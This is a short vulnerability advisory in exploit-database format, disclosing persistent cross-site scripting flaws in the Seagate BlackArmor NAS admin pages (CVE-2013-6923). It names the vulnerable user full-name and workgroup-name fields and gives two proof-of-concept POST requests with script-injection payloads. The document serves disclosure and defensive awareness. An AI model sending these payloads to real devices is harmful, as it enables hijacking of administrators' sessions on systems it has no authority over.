# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site
Scripting Vulnerabilities
# Google Dork: N/A# Date: 04-01-2014# Exploit Author: Jeroen - IT Nerdbox# Vendor Homepage:<http://www.seagate.com/> http://www.seagate.com/# Software Link:<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/>
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/# Version: sg2000-2000.1331# Tested on: N/A# CVE : CVE-2013-6923### Description:## When adding a user to the device, it is possible to enter a full name.
This input field does not# sanitize its input and it is possible to enter any payload which will get
executed upon reload.## The workgroup configuration is also vulnerable to persistent XSS. The Work
Group name input# field does not sanitize its input.## This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed.### Proof of Concept #1:# # POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en# Parameters:## index = 2# fullname = <script>alert(1);</script># submit = Submit# ### Proof of Concept #2:## POST: http(s)://<url |
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
# Parameter:## workname = "><input onmouseover=prompt(1) >
